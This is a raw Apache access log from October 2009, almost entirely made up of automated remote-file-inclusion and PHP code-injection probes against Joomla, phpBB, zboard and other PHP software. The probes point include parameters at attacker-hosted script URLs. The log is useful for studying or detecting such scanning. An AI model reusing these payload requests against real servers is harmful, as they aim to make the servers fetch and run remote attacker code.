220.125.237.35 - - [06/Oct/2009:01:22:26 -0400] "GET /logs/access_log.Q109051500/error.php?dir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:01:22:26 -0400] "GET /logs/error.php?dir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:01:22:26 -0400] "GET /logs/access_log.Q109070800/error.php?dir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
187.6.104.107 - - [06/Oct/2009:01:22:28 -0400] "GET /logs/access_log.Q109071700//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:22:33 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
174.37.136.126 - - [06/Oct/2009:01:22:36 -0400] "GET /logs/access_log.Q109092200%20%20//?_zb_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:22:37 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:22:37 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:22:37 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:22:51 -0400] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:22:52 -0400] "GET /logs/access_log.Q109080400%20%20//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:22:52 -0400] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 20719 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:22:56 -0400] "GET /logs/access_log.Q109070800%20%20//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:01:23:31 -0400] "GET /logs/error.php?dir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:01:23:31 -0400] "GET /error.php?dir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:01:23:31 -0400] "GET /logs/access_log.Q109051500/error.php?dir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:01:23:36 -0400] "GET /logs/access_log.Q109070800/error.php?dir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.237.203.241 - - [06/Oct/2009:01:24:13 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://pappermint.casu.net/bbs/bjork/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.237.203.241 - - [06/Oct/2009:01:24:14 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://pappermint.casu.net/bbs/bjork/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.237.203.241 - - [06/Oct/2009:01:24:14 -0400] "GET /logs/access_log.Q109080200//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://pappermint.casu.net/bbs/bjork/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.12.13.152 - - [06/Oct/2009:01:24:16 -0400] "GET /logs/access_log.Q109070800/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.12.13.152 - - [06/Oct/2009:01:24:16 -0400] "GET /logs/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.12.13.152 - - [06/Oct/2009:01:24:16 -0400] "GET /error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
81.12.13.152 - - [06/Oct/2009:01:24:16 -0400] "GET /logs/access_log.Q109051500/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.15.108.170 - - [06/Oct/2009:01:25:38 -0400] "GET /logs/access_log.Q109083100//include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
67.15.108.170 - - [06/Oct/2009:01:25:39 -0400] "GET /logs/access_log.Q109091000//include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:01:26:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.112.120 - - [06/Oct/2009:01:26:31 -0400] "GET /logs/error_log.Q109061000 HTTP/1.0" 200 2143781 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.168.176.42 - - [06/Oct/2009:01:27:30 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
213.168.176.42 - - [06/Oct/2009:01:27:30 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.168.176.42 - - [06/Oct/2009:01:27:30 -0400] "GET /logs/error_log.Q109071700%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
67.195.112.120 - - [06/Oct/2009:01:27:55 -0400] "GET /logs/access_log.Q109061800 HTTP/1.0" 200 4635924 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.237.203.241 - - [06/Oct/2009:01:28:48 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://pappermint.casu.net/bbs/bjork/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.237.203.241 - - [06/Oct/2009:01:28:48 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://pappermint.casu.net/bbs/bjork/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.237.203.241 - - [06/Oct/2009:01:28:48 -0400] "GET /logs/access_log.Q109080200//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://pappermint.casu.net/bbs/bjork/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.57.166.249 - - [06/Oct/2009:01:29:02 -0400] "GET /logs/access_log.Q109060300//include/bbs.lib.inc.php?site_path=http://omasol.free.fr/whois?%0D? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
202.57.166.249 - - [06/Oct/2009:01:29:02 -0400] "GET /logs/access_log.Q109070300//include/bbs.lib.inc.php?site_path=http://omasol.free.fr/whois?%0D? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
91.121.75.81 - - [06/Oct/2009:01:29:21 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:29:21 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:29:21 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:29:22 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:29:22 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:29:22 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.185.129.36 - - [06/Oct/2009:01:29:30 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://omasol.free.fr/whois?%0D? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
203.185.129.36 - - [06/Oct/2009:01:29:30 -0400] "GET //include/bbs.lib.inc.php?site_path=http://omasol.free.fr/whois?%0D? HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
203.185.129.36 - - [06/Oct/2009:01:29:30 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://omasol.free.fr/whois?%0D? HTTP/1.1" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
91.121.75.81 - - [06/Oct/2009:01:29:55 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:29:55 -0400] "GET /logs/access_log.Q109082100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:29:55 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:29:59 -0400] "GET /logs/access_log.Q109082100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:29:59 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:29:59 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [06/Oct/2009:01:30:06 -0400] "GET /logs///appserv/mani.php?appserv_root=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
72.11.145.8 - - [06/Oct/2009:01:30:06 -0400] "GET ///appserv/mani.php?appserv_root=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
72.11.145.8 - - [06/Oct/2009:01:30:06 -0400] "GET /logs/access_log.Q109051400%20%20///appserv/mani.php?appserv_root=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:30:06 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:30:06 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:30:06 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:30:08 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:30:13 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:30:15 -0400] "GET /logs/access_log.Q109062900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:30:28 -0400] "GET /logs/access_log.Q109092000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:30:34 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:30:34 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:30:34 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:30:45 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:30:45 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:30:45 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:30:45 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:30:45 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:30:45 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:30:46 -0400] "GET /logs/access_log.Q109080800%20%20//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:01:31:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.143.3.188 - - [06/Oct/2009:01:31:21 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/3.0 (OS/2; U)"
174.143.3.188 - - [06/Oct/2009:01:31:21 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.61 [en] (OS/2; U)"
174.143.3.188 - - [06/Oct/2009:01:31:21 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
174.143.3.188 - - [06/Oct/2009:01:31:21 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Advanced Browser (http://www.avantbrowser.com)"
67.195.112.120 - - [06/Oct/2009:01:31:33 -0400] "GET /logs/error_log.Q109090400 HTTP/1.0" 200 2479685 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.120 - - [06/Oct/2009:01:31:36 -0400] "GET /logs/error_log.Q109090400 HTTP/1.0" 200 2479685 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.175.35.138 - - [06/Oct/2009:01:32:07 -0400] "GET /logs/access_log.Q109091200//?_zb_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.175.35.138 - - [06/Oct/2009:01:32:11 -0400] "GET /logs/access_log.Q109051100//?_zb_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
202.57.166.249 - - [06/Oct/2009:01:32:30 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://omasol.free.fr/whois?%0D? HTTP/1.1" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
206.225.23.4 - - [06/Oct/2009:01:32:49 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright?? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
69.62.196.11 - - [06/Oct/2009:01:33:03 -0400] "GET /logs/My_eGallery/index.php?basepath=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.62.196.11 - - [06/Oct/2009:01:33:05 -0400] "GET /My_eGallery/index.php?basepath=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.62.196.11 - - [06/Oct/2009:01:33:05 -0400] "GET /logs/access_log.Q109051100%20%20/My_eGallery/index.php?basepath=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
61.129.64.174 - - [06/Oct/2009:01:33:09 -0400] "GET /logs/access_log.Q109083100//include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.185.129.36 - - [06/Oct/2009:01:33:15 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://omasol.free.fr/whois?%0D? HTTP/1.1" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
213.168.176.42 - - [06/Oct/2009:01:33:27 -0400] "GET /logs/access_log.Q109071700%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.11.145.8 - - [06/Oct/2009:01:33:37 -0400] "GET /logs/access_log.Q109080600%20%20///appserv/mani.php?appserv_root=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.129.64.174 - - [06/Oct/2009:01:33:50 -0400] "GET /logs/access_log.Q109072000//include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:34:44 -0400] "GET /logs/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:34:44 -0400] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:34:44 -0400] "GET /logs/access_log.Q109091400%20%20/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:34:44 -0400] "GET /logs/access_log.Q109091400%20%20/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:34:44 -0400] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:34:44 -0400] "GET /logs/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:34:49 -0400] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:34:49 -0400] "GET /logs/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:34:49 -0400] "GET /logs/access_log.Q109091400%20%20/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:34:50 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:34:51 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:34:58 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:34:59 -0400] "GET /logs/access_log.Q109070800//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:35:04 -0400] "GET /logs/access_log.Q109080400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:35:31 -0400] "GET /logs/access_log.Q109062900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:35:35 -0400] "GET /logs/access_log.Q109092000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
